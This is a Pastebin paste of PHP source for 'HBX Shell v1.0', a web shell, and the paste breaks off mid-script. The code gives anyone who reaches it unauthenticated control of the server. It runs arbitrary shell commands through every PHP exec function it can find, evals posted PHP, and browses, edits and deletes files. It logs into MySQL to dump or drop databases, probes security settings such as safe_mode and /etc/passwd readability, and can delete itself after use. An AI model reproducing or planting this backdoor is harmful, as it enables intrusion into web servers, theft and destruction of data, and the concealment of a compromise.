Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ob_start();
- session_start();
- $shell=array("Background"=>"#000000","Primary_Color"=>"#FFFFFF","Border"=>"#3388ff","Font"=>"Arial","Hover"=>"#00FF00",
- "Header_Color"=>"#3388ff","Header_Font"=>"verdana","Link_Color"=>"#3388ff","Input_BG"=>"#000000","Input_Color"=>"#3388ff","Input_Border"=>"#bbbbbb", "Textarea_BG"=>"#000000","Textarea_Color"=>"#FFFFFF","Textarea_Border"=>"#3388ff",
- "CMD_BG"=>"#000000","CMD_COLOR"=>"#3388ff","CMD_BORDER"=>"#3377dd","CMD_FONT"=>"Arial");
- if(isset($_GET['sqldl'])) {mysql_prepare_dump_file(); exit;}
- if(isset($_POST['s'])) {
- switch($_POST['s']) {
- case 'rename':
- rename_file($_POST['file'],$_POST['rname']);
- break;
- case 'chmod':
- if(is_dir($_POST['file'])) chmod_dir($_POST['file'],$_POST['mod'],true);
- else chmod_file($_POST['file'],$_POST['mod']);
- break;
- case 'mv':
- if(is_dir($_POST['file'])) move_dir($_POST['file'],$_POST['location'],true);
- else move_file($_POST['file'],$_POST['location']);
- break;
- case 'del':
- if(is_dir($_POST['file'])) delete_dir($_POST['file'],true);
- else delete_file($_POST['file']);
- break;
- case 'view':
- if(!isset($_POST['f'])) list_contents();
- else view_file($_POST['f']);
- break;
- case 'fsave':
- write_contents();
- break;
- case 'sql':
- sql_login();
- break;
- case 'sqlview':
- sql_viewer();
- break;
- case 'insert':
- sql_insert();
- break;
- case 'query':
- execute_query(stripslashes($_POST['q']));
- break;
- case 'logout':
- sql_end_session();
- break;
- case 'create':
- sql_create();
- break;
- case 'drop':
- sql_drop();
- break;
- case 'edit':
- sql_edit();
- break;
- case 'eval':
- post_eval();
- break;
- case 'cmd':
- console();
- break;
- case 'exec':
- echo execute_cmd($_POST['cmd']);
- break;
- case 'kill':
- kill_shell();
- break;
- default:
- list_contents();
- break;
- }
- exit;
- }
- if(isset($_GET['dl']))
- {
- $fh=fopen($_GET['dl'],'r');
- while(!feof($fh)) $file.=stripslashes(fgets($fh));
- fclose($fh);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($file));
- header("Content-disposition: attachment; filename=".basename($_GET['dl']).";");
- echo $file;
- exit;
- }
- $location=getcwd().'\\'.basename($_SERVER['PHP_SELF']);
- $local_addr=$_SERVER['REMOTE_ADDR'];
- $local_host=gethostbyaddr($local_addr);
- $remote_host=$_SERVER['HTTP_HOST'];
- $remote_addr=gethostbyname($remote_host);
- $open_basedir=(ini_get("open_basedir")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
- $safe_mode=(ini_get("safe_mode")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
- $mysql_on=(function_exists("mysql_connect")&&is_callable("mysql_connect"))?"<font color='#00FF00'><b>On</b></font>":"<font color='#FF0000'>Off</font>";
- $disabled_functions=(ini_get("disable_functions"))?ini_get("disable_functions"):"<font color='#00FF00'><b>None</b></font>";
- $software=$_SERVER['SERVER_SOFTWARE'];
- $php_ver=phpversion();
- $uname=php_uname();
- $curl_on=(function_exists("curl_init")&&is_callable("curl_init"))?"<font color='#00FF00'><b>Enabled</b></font>":"<font color='#FF0000'>Off</font>";
- $read_passwd=(file_exists("/etc/passwd")&&is_readable("/etc/passwd"))?"<font color='#00FF00'><b>Yes</b></font>":"<font color='#FF0000'>No</font>";
- $disk_free=size(disk_free_space(getcwd()));
- $disk_space=size(disk_total_space(getcwd()));
- $includes=(@ini_get('allow_url_include')=='')?"<font color='#FF0000'>Disabled</font>":"<font color='#00FF00'><b>Enabled</b></font>";
- function execute_cmd($cmd) {
- @$_dfunctions=ini_get("disable_functions");
- $_dfunctions=str_replace(' ','',$_dfunctions);
- $farr=explode(',',$_dfunctions);
- $_functions=array("shell_exec","exec","passthru","system","popen","proc_open");
- foreach($_functions as $_function)
- {
- if(!in_array($_function,$farr))
- {
- if($_function=="exec")
- {
- @$buf=exec($cmd,$arr);
- $ret=join("\n",$buf);
- }
- elseif($_function=="system")
- {
- @$ret=system($cmd);
- }
- elseif($_function=="passthru")
- {
- @$ret=passthru($cmd);
- }
- elseif($_function=="shell_exec")
- {
- @$ret=shell_exec($cmd);
- }
- elseif($_function=="popen")
- {
- @$p=popen($cmd,'r');
- if(is_resource($p))
- {
- while(!feof($p)) $ret.=fgets($p);
- @pclose($p);
- }
- }
- elseif($_function=="proc_open")
- {
- $cmdpipe=array(
- 0=>array('pipe','r'),
- 1=>array('pipe','w')
- );
- @$proc=proc_open($cmd,$cmdpipe,$pipes);
- if(@is_resource($proc))
- {
- while(@!feof($pipes[1]))
- $ret.=@fgets($pipes[1]);
- @fclose($pipes[1]);
- @proc_close($resource);
- }
- }
- return $ret;
- }
- }
- }
- //Begin file functions
- //Primary
- function list_contents() {
- $dirs_array=array(
- "Name"=>array(),
- "Link"=>array(),
- "Size"=>array(),
- "Group"=>array(),
- "Owner"=>array(),
- "Perms"=>array(),
- "Modified"=>array()
- );
- $files_array=$dirs_array;
- $dir=(isset($_POST['d']))?clean_dir($_POST['d']):clean_dir(getcwd());
- if(!@$dh=opendir($dir)) die("Permission denief in $dir!");
- while((@$file=readdir($dh))) {
- if($file=='.') continue;
- $full_path=$dir.'/'.$file;
- if(is_dir($full_path)) {
- $dirs_array['Name'][]=$file;
- $dirs_array['Link'][]=$full_path;
- $dirs_array['Size'][]="DIR";
- $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
- $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
- if(is_array($owner)) $owner=$owner['Name'];
- if(is_array($grp)) $grp=$grp['Name'];
- $dirs_array['Owner'][]=$owner;
- $dirs_array['Group'][]=$grp;
- $dirs_array['Perms'][]=get_perms(fileperms($full_path),'d');
- $dirs_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
- }
- else {
- $files_array['Name'][]=$file;
- $files_array['Link'][]=$full_path;
- $files_array['Size'][]=size(filesize($full_path));
- $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
- $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
- if(is_array($owner)) $owner=$owner['name'];
- if(is_array($grp)) $grp=$grp['name'];
- $files_array['Owner'][]=$owner;
- $files_array['Group'][]=$grp;
- $files_array['Perms'][]=get_perms(fileperms($full_path),'f');
- $files_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
- }
- }
- @closedir($dh);
- asort($dirs_array);
- asort($files_array);
- echo "
- <div class='info'>
- <table><tr><td><font color='#FF00FF'>[ Executable ]</font></td><td><font color='#0000FF'>[ Writable ]</font></td>
- <td><font color='#FF0000'>[ Config ]</font></td><td><font color='#00FF00'>[ DIR ]</font></td></tr></table><center>Viewing directory: ";
- $arr=explode('/',$dir);
- foreach($arr as $piece) {
- $path.="$piece/";
- echo "<a href='#' onClick=\"sendRequest('view&d=$path')\">$piece/</a>";
- }
- echo "</center></div><br />
- <table style='width: 100%'>
- <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Modified</td><td>Actions</td></tr>";
- for($d=0;$d<count($dirs_array['Name']);$d++) {
- $nm=$dirs_array['Name'][$d];
- if($nm=="..") $link=dir_lower(clean_dir($dirs_array['Link'][$d]));
- else $link=$dirs_array['Link'][$d];
- echo "<tr><td><a href='#' onClick=\"sendRequest('view&d=$link')\"><font color='#00FF00'>[$nm]</font></a></td><td>".$dirs_array['Size'][$d]."</td><td>"
- .$dirs_array['Owner'][$d].'/'.$dirs_array['Group'][$d]."</td><td>".$dirs_array['Perms'][$d]."</td><td>"
- .$dirs_array['Modified'][$d]."</td><td><a href='#' onClick=\"loadInput('chmod','".$dirs_array['Link'][$d]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('move','".$dirs_array['Link'][$d]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$dirs_array['Link'][$d]."')\">[ Delete ]</a></td><td><input type='checkbox'></td></tr>";
- }
- for($i=0;$i<count($files_array['Name']);$i++) {
- if(is_executable($files_array['Link'][$i])) $color='#FF00FF';
- else if(eregi("config",$files_array['Link'][$i])) $color='#FF0000';
- else if(strrchr($files_array['Name'][$i],'.')=="sql" || strrchr($files_array['Name'][$i],'.')=="db") $color='#00FF00';
- else if(is_writable($files_array['Link'][$i])) $color='#0000FF';
- else $color="#FFFFFF";
- $nm=$files_array['Name'][$i];
- echo "<tr style='color: $color;'><td>
- <a href='#' onClick=\"sendRequest('view&f=".$files_array['Link'][$i]."')\"><font color='$color'>$nm</a></font></td><td>"
- .$files_array['Size'][$i]."</td><td>".$files_array['Owner'][$i].'/'.$files_array['Group'][$i]."</td><td>".$files_array['Perms'][$i]."</td><td>"
- .$files_array['Modified'][$i]."</td><td><a href='#' onClick=\"loadInput('chmod','".$files_array['Link'][$i]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('rename','".$files_array['Link'][$i]."')\">[ Rename ]</a> <a href='#' onClick=\"loadInput('move','".$files_array['Link'][$i]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$files_array['Link'][$i]."')\"> [ Delete ] </a><a href='?dl=".$files_array['Link'][$i]."' target='_blank'>[ Download ]</a></td><td><input type='checkbox'></td></tr>";
- }
- echo "</table>";
- }
- function view_file($file) {
- $fh=fopen($file,'r');
- if(is_resource($fh)) {
- while(!feof($fh)) $fcontents.=htmlspecialchars(fgets($fh));
- fclose($fh);
- echo "<center><a href='#' onClick=\"sendRequest('fsave&f=$file','save')\">[ Save ]</a></center>
- <textarea id='file' rows='20' style='width: 100%'>$fcontents</textarea>";
- } else {echo "Failed to open file $file for reading!<br /><br />"; list_contents();}
- }
- function create_file($file) {
- @$fh=fopen($file,'w');
- @fclose($fh);
- }
- function write_contents() {
- if(is_resource($fh=fopen($_POST['f'],'w'))) {
- fwrite($fh,stripslashes($_POST['data']),strlen($_POST['data']));
- fclose($fh);
- echo "File $_POST[f] saved successfully!<br /><br />";
- } else {echo "Failed to write to file $_POST[f]!<br /><br />";}
- list_contents();
- }
- //Secondary
- function get_perms($mode,$type) { #Update for *nix perms later.
- if($type=='d') $mode=substr(base_convert($mode,10,8),2);
- else $mode=substr(base_convert($mode,10,8),3);
- return $mode;
- }
- function chmod_file($file,$perms) {
- if(chmod($file,$perms)) echo "Managed to chmod file $file successfully.<br /><br />";
- else echo "Failed to chmod file $file.<br /><br />";
- list_contents();
- }
- function rename_file($old,$new) {
- $arr=explode('/',$old);
- array_pop($arr);
- foreach($arr as $piece) $rname.="$piece/";
- $rname.=$new;
- if(rename($old,$rname)) echo "Managed to rename file $file successfully.<br /><br />";
- else echo "Failed to rename file $file.<br /><br />";
- list_contents();
- }
- function move_file($old,$new) {
- $fh=fopen($old,'r');
- $fh2=fopen($new,'w');
- if(is_resource($fh2)&&is_resource($fh)) {
- while(!feof($fh)) $out_contents.=fgets($fh);
- fwrite($fh2,$out_contents,strlen($out_contents));
- fclose($fh);
- fclose($fh2);
- echo "Moved file $old to $new successfully.<br /><br />";
- } else {echo "Failed to move file $old to $new<br /><br />";}
- list_contents();
- }
- function delete_file($file) {
- if(unlink($file)) echo "Managed to delete file $file successfully.<br /><br />";
- else echo "Failed to delete file $file.<br /><br />";
- list_contents();
- }
- //Repetitive file functions
- function chmod_dir($dir,$perms,$call=false,$success=0,$files=0) {
- $files=$success=0;
- if(is_resource($dh=opendir($dir))) {
- while(($file=readdir($dh))) {
- if($file==".."||$file==".") continue;
- $files++;
- if(is_dir($dir.'/'.$file)) {
- chmod_dir($dir.'/'.$file,$perms,false,$success,$files);
- continue;
- }
- if(chmod($dir.'/'.$file,$perms)) {$success++; echo "CHMOD $file to $perms<br />";}
- }
- closedir($dh);
- if($call) echo "Changed perms for $success files out of $files files.<br /><br />";
- } else {echo "Failed to open dir $dir<br /><br />";}
- if($call) list_contents();
- }
- function move_dir($dir,$loc,$call=false) {
- if(is_resource($dh=opendir($dir))) {
- if(!is_dir($loc)) {
- if(!mkdir($loc)) die("Failed to create new location!");
- if(is_resource($dh2=opendir($loc))) {
- while(($file=readdir($dh))) {
- if($file=='.'||$file=='..') continue;
- if(is_dir($dir.'/'.$file)) {
- move_dir($dir.'/'.$file.'/',$loc.'/'.$file);
- continue;
- }
- create_file($loc.'/'.$file);
- $cur=fopen($dir.'/'.$file,'r');
- while(!feof($cur)) $contents.=fgets($cur);
- fclose($cur);
- $cur=fopen($loc.'/'.$file,'w');
- fwrite($cur,$contents,strlen($contents));
- fclose($cur);
- }
- } else {echo "Failed to [M] open dir $loc!";}
- } else {echo "Failed to open dir $dir!<br /><br />";}
- }
- if($call) list_contents();
- }
- function delete_dir($dir,$call=false,$success=0,$files=0) {
- if(is_resource($dh=opendir($dir))) {
- $files=$success=0;
- while(($file=readdir($dh))) {
- if($file==".."||$file==".") continue;
- $files++;
- if(is_dir($dir.'/'.$file)) {
- delete_dir($dir.'/'.$file,false,$success,$files);
- continue;
- }
- if(unlink($dir.'/'.$file)) {$success++; echo "Deleted $file...<br />";}
- }
- closedir($dh);
- if($call) echo "Deleted $success files out of $files files.<br /><br />";
- } else {echo "Failed to open dir $dir.<br /><br />";}
- if($call) list_contents();
- }
- //End
- function clean_dir($d) {
- $d=str_replace("\\","/",$d);
- $d=str_replace("//","/",$d);
- return $d;
- }
- function dir_lower($d) {
- $dir=explode("/",$d);
- array_pop($dir);
- array_pop($dir);
- foreach($dir as $chunks) $lower.="$chunks/";
- return $lower;
- }
- function size($s) {
- if(!$s) return "0 B";
- if($s>=1073741824) return(round($s/1073741824)." GB");
- elseif($s>=1048576) return(round($s/1048576)." MB");
- elseif($s>=1024) return(round($s/1024)." KB");
- else return($s.=" B");
- }
- //End file functions
- //Begin SQL functions
- function sql_login() {
- if(isset($_SESSION['user'])) {mysql_view_dbs();}
- else if(!isset($_POST['host'])) {
- echo "<center>
- Host:Port: <input type='text' id='sql_host' value='localhost:3306'><br />
- Username: <input type='text' id='sql_user' value='root'><br />
- Password: <input type='password' id='sql_pass'><br /><br />
- <a href='#' onClick=\"sendRequest('sql','sqllogin')\">[ Login ]</a>
- </center>";
- } else {
- echo "<center>";
- if(@$conn=mysql_connect($_POST['host'],$_POST['user'],$_POST['pass'])) {
- echo "<font color='#00FF00'><b>Access granted</b></font></center>";
- $_SESSION['host']=$_POST['host'];
- $_SESSION['user']=$_POST['user'];
- $_SESSION['pass']=$_POST['pass'];
- mysql_view_dbs();
- } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
- }
- }
- function mysql_view_dbs() {
- extract($_SESSION);
- echo "<center><br /><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table>";
- if(@$conn=mysql_connect($host,$user,$pass)) {
- echo "<tr><td>Database</td><td>Tables</td></tr>";
- $dbs=mysql_list_dbs();
- while($db=mysql_fetch_array($dbs))
- {
- $cur=mysql_query("SHOW TABLES FROM $db[Database]");
- $count=mysql_num_rows($cur);
- echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$db[Database]')\">$db[Database]</a></td><td>$count</td><td><a href='?sqldl=1&db=$db[Database]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$db[Database]')\">[ Drop ]</a></td></tr>";
- }
- } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
- echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Create Database ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' value='New_Database' onKeyDown=\"checkKey(event,'create')\"></div><br /><br />Execute query<br /><br /><input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- }
- function sql_viewer() {
- extract($_SESSION);
- echo "<center><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table style='text-align: center;'>";
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- echo "<tr><td>Table</td><td>Columns</td></tr>";
- $query=mysql_query("SHOW TABLES FROM $_POST[db]");
- while($tbl=mysql_fetch_array($query)) {
- $cols=mysql_query("SHOW COLUMNS FROM $_POST[db].$tbl[0]");
- $count=mysql_num_rows($cols);
- echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$_POST[db]&tbl=$tbl[0]')\">$tbl[0]</a></td><td>$count</td><td><a href='?sqldl=1&db=$_POST[db]&tbl=$tbl[0]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$tbl[0]')\">[ Drop ]</a></td></tr>";
- }
- echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Insert table ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' style='width: 20%' value='new_table' onKeyDown=\"checkKey(event,'createtbl')\"><input type='hidden' id='sql_db' value='$_POST[db]'></div><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- } elseif(isset($_POST['tbl'])) {
- $columns=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
- echo "<tr>";
- for($t=0;$t<count($columns);$t++) echo "<td>$columns[$t]</td>";
- echo "<td>Row actions</td></tr>";
- $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl]");
- while($row=mysql_fetch_array($query)) {
- echo "<tr>";
- for($i=0;$i<count($columns);$i++)
- echo "<td>$row[$i]</td>";
- echo "<td><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v='+encodeURIComponent('$row[0]')+'')\">[ Edit Row ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v=$row[0]')\">[ Remove row ]</a></td>";
- echo "</tr>";
- }
- echo "</table><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]')\">[ Insert row ]</a><br /><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
- }
- }
- }
- function mysql_prepare_dump_file()
- {
- echo "<h2>Preparing to dump SQL data...<br />";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- echo "Logged on to SQL server...good.<br />";
- $dump_file="#######################SQL Data dumped by HBX Shell (version 1.0)#######################\r\n";
- $dump_name=isset($_GET['tbl'])?$_GET['db'].'_'.$_GET['tbl'].'.sql':$_GET['db'].'.sql';
- if(isset($_GET['tbl'])) {
- echo "Dumping data from table $_GET[tbl]...<br />";
- mysql_select_db($_GET['db']);
- $columns=array();
- $query=mysql_query("SHOW COLUMNS FROM $_GET[tbl]");
- while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_GET[tbl]");
- while($row=mysql_fetch_array($query)) {
- $dump_file.="INSERT INTO `$_GET[tbl]` (";
- for($i=0;$i<count($columns);$i++) {
- if($i==count($columns)-1)
- $dump_file.="`$columns[$i]`)\r\n";
- else
- $dump_file.="`$columns[$i]`,";
- }
- $dump_file.="VALUES ( ";
- for($j=0;$j<count($row);$j++) {
- if($j==count($row)-1)
- $dump_file.="`$row[$j]`)\r\n";
- else
- $dump_file.="`$row[$j]`,";
- }
- }
- }
- else {
- echo "Dumping data from database $_GET[db]...<br />";
- $tables=array();
- $columns=array();
- $query=mysql_query("SHOW TABLES FROM $_GET[db]");
- while($tbl=mysql_fetch_array($query)) $tables[]=$tbl[0];
- foreach($tables as $current_table) {
- $current_cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$current_table");
- while($col=mysql_fetch_array($current_cols)) $columns[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_GET[db].$current_table");
- while($row=mysql_fetch_array($query)) {
- $dump_file.="INSERT INTO `$current_table` (";
- for($i=0;$i<count($columns);$i++) {
- if($i==count($columns)-1)
- $dump_file.="`$columns[$i]`) \r\n";
- else
- $dump_file.="`$columns[$i]`,";
- }
- $dump_file.="VALUES ( ";
- for($j=0;$j<count($row);$j++) {
- if($j==count($row)-1)
- $dump_file.="`$row[$j]`)\r\n";
- else
- $dump_file.="`$row[$j]`,";
- }
- }
- $columns=array(); #Reset this badboy
- }
- }
- $dump_file.="END OF SQL DUMP\r\n";
- $dump_file.="########################################################################################";
- ob_get_clean();
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($dump_file));
- header("Content-disposition: attachment; filename=$dump_name;");
- echo $dump_file;
- exit;
- }
- else echo "Failed to login! Cannot dump SQL.";
- echo "</h2>";
- }
- function sql_drop() {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- mysql_query("DROP DATABASE $_POST[db]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Dropped database $_POST[db] successfully.</font><br /></center>";
- mysql_view_dbs();
- } elseif(isset($_POST['tbl'])&&!isset($_POST['row'])) {
- mysql_query("DELETE FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Dropped table $_POST[tbl] successfully.</font><br /></center>";
- mysql_view_dbs();
- } else {
- mysql_query("DELETE FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
- echo "<center><font color='#00FF00'>Deleted row successfully.</font><br /></center>";
- mysql_view_dbs();
- }
- }
- }
- function sql_create() {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if(!isset($_POST['tbl'])) {
- mysql_query("CREATE DATABASE $_POST[db]") or die(mysql_error());
- echo "<center><font color='#00FF00'>Created database $_POST[db] successfully.</font><br /></center>";
- mysql_view_dbs();
- } else {
- mysql_query("CREATE TABLE $_POST[db].$_POST[tbl] (`TEMPORARY` TEXT NOT NULL)") or die(mysql_error());
- echo "<center><font color='#00FF00'>Created table $_POST[db].$_POST[tbl] successfully.</font><br /></center>";
- mysql_view_dbs();
- }
- }
- }
- function sql_insert() {
- echo "<center><form id='vals'>";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- $cols=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- if(!isset($_POST['update'])) {
- for($i=0;$i<count($cols);$i++) {
- echo "<input type='hidden' value='$cols[$i]'>
- $cols[$i]: <input type='text'><br />";
- }
- echo "</form><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]','insert')\">[ Insert ]</a>";
- } else {
- $fields=array();
- $rows=array();
- foreach($_POST as $key=>$value) {
- if(in_array($key,$cols)) {
- $fields[]="'".$value."'";
- $rows[]="`".$key."`";
- }
- }
- $vals=implode(",",$fields);
- $keys=implode(",",$rows);
- mysql_query("INSERT INTO $_POST[db].$_POST[tbl] ($keys) VALUES ($vals)") or die(mysql_error());
- echo "Inserted row successfully.";
- }
- }
- echo "</center>";
- mysql_view_dbs();
- }
- function sql_edit() {
- $cols=array();
- echo "<center>";
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- if($_POST['update']!=1) {
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
- if(mysql_num_rows($query)>0) {
- echo "<form id='sqlvals'>";
- while($row=mysql_fetch_array($query)) {
- for($i=0;$i<count($cols);$i++)
- echo "<input type='hidden' value='$cols[$i]'>$cols[$i]: <input type='text' value='$row[$i]'><br />";
- }
- echo "</form><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row='+encodeURIComponent('$_POST[row]')+'&v='+encodeURIComponent('$_POST[v]')+'','sqlsave')\">[ Save ]</a>";
- } else {echo "MySQL returned 0 results.";}
- } else {
- $vals=array();
- $keys=array();
- $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
- while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
- $update="UPDATE $_POST[db].$_POST[tbl]";
- foreach($_POST as $k=>$v) {
- if(in_array($k,$cols)) {
- $vals[]=$v;
- $keys[]=$k;
- }
- }
- for($j=0;$j<count($vals);$j++) {
- if($j==count($vals)-1) {$update.=" SET `$keys[$j]`='$vals[$j]' WHERE $_POST[row]='$_POST[v]'"; break;}
- $update.=" SET `$keys[$j]`='$vals[$j]',";
- }
- echo $update."<br />";
- mysql_query($update) or die(mysql_error());
- echo "Updated row successfully!<br />";
- }
- } else {echo "<font color='red'>Warning: Failed to connect to SQL server</font>";}
- echo"</center>";
- mysql_view_dbs();
- }
- function sql_end_session() {
- $_SESSION=array();
- session_destroy();
- echo "<center><font color='#00FF00'>Logged out from SQL</font></center><br />";
- sql_login();
- }
- function execute_query($query) {
- extract($_SESSION);
- if(@$conn=mysql_connect($host,$user,$pass)) {
- mysql_query($query) or die(mysql_error());
- $affected=mysql_affected_rows();
- echo "Query executed. Affected rows: $affected";
- }
- }
- //End SQL functions
- function find_exploits() {
- $exploits=array("File inclusion"=>"/(include|include_once|require|require_once)\(\\$_[GP].*{2,3}\[/");
- }
- function post_eval() {
- if(isset($_POST['e'])) {
- echo eval(stripslashes($_POST['e']));
- } else {
- echo "<textarea id='eval_out' style='width: 100%; display: none;' rows='10'>//Don't include PHP tags</textarea><br /><textarea id='eval' style='width: 100%' rows='10'>//Don't include PHP tags</textarea><br /><center><a href='#' onClick=\"sendRequest('eval','eval')\">[ Eval ]</a>";
- }
- }
- function console() {
- echo "<div id='cmd'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'exec')\"id='cmd_in'><br /><textarea id='cmd_out' style='width: 100%;' rows='20'></textarea></div>";
- }
- function kill_shell() {
- if(!isset($_POST['dokill'])) {
- echo "<center><h1><a href='#' onClick=\"sendRequest('kill&dokill=1')\">[ Confirm kill ]</a></h1></center>";
- } else {
- if(unlink(basename($_SERVER['PHP_SELF']))) echo "<center>Thanks for using HBX shell! - HomicidalMortician</center>";
- else echo "<center><font color='red'>Warning: Failed to delete shell</font></center>";
- }
- }
- ?>
- <html>
- <head>
- <title>HBX Shell v1.0 | BETA</title>
- <?php
- echo "
- <style>
- body {
- background-color: $shell[Background];
- font-size: 12px;
- color: $shell[Primary_Color];
- }
- a {
- text-decoration: none;
- color: $shell[Link_Color];
- }
- td {
- border-color: $shell[Border];
- }
- a:hover {
- color: $shell[Hover];
- }
- input {
- background-color: $shell[Input_BG];
- color: $shell[Input_Color];
- border: 1px solid $shell[Input_Border];
- }
- textarea {
- background-color: $shell[Textarea_BG];
- color: $shell[Textarea_Color];
- font-family: $shell[Textarea_Font];
- border: 1px solid $shell[Textarea_Border];
- }
- select {
- background-color: #222222;
- color: #3388ff;
- }
- #header {
- font-size: 12px;
- background-color: #000000;
- padding-left: 2px;
- color: $shell[Header_Color];
- font-family: $shell[Header_Font]
- }
- #browse {
- background-color: #000000;
- color: #FFFFFF;
- border-bottom: 1px solid $shell[Border];
- text-align: center;
- padding-bottom: 5px;
- }
- #browse a {
- color: #3388ff;
- text-decoration: none;
- padding-left: 30px;
- font-size: 12px;
- font-family: Arial, Helvetica, sans-serif;
- }
- #browse a:hover {
- color: #00FF00;
- text-decoration: underline;
- }
- #shell {
- font-family: $shell[Font];
- border-bottom: 1px solid $shell[Border];
- font-size: 12px;
- padding-bottom: 20px;
- background-color: #000000;
- }
- #shell td {
- padding-right: 10px;
- font-size: 14px;
- }
- #shell tr:hover {
- background-color: #333333;
- }
- #back {
- float: right;
- }
- #back a{
- font-size: 10px;
- }
- .info td {
- padding-right: 5px;
- }
- #cmd textarea {
- background-color: $shell[CMD_BG];
- color: $shell[CMD_COLOR];
- font-family: $shell[CMD_FONT];
- border: 1px solid $shell[CMD_BORDER];
- }
- #cmd input {
- background-color: $shell[CMD_BG];
- color: $shell[CMD_COLOR];
- border: 1px solid $shell[CMD_BORDER];
- }
- </style>"; ?>
- <script>
- var m_history=[];
- var current=0;
- var sz=0;
- function history_back(last) {
- m_history=[last];
- document.getElementById("back").innerHTML="<a href='#' onClick=\"sendRequest('"+m_history[0]+"')\">[ Back ]</a>";
- }
- function show(id) {
- var opt=document.getElementById(id).style.display;
- if(opt=='none') document.getElementById(id).style.display='block';
- else document.getElementById(id).style.display='none';
- }
- function checkKey(e,req) {
- var request='';
- if(window.event) key=e.keyCode;
- else if(e.which) key=e.which;
- if(key==13) {
- if(req=='exec') {
- req+='&cmd='+document.getElementById('cmd_in').value;
- sendRequest(req,'cmd');
- }
- else if(req=='create') {
- req+="&db="+document.getElementById('new_database').value;
- sendRequest(req);
- }
- else if(req=='createtbl') {
- req="create";
- req+="&db="+document.getElementById('sql_db').value+"&tbl="+document.getElementById('new_database').value;
- sendRequest(req);
- } else if(req=='sql_query') {
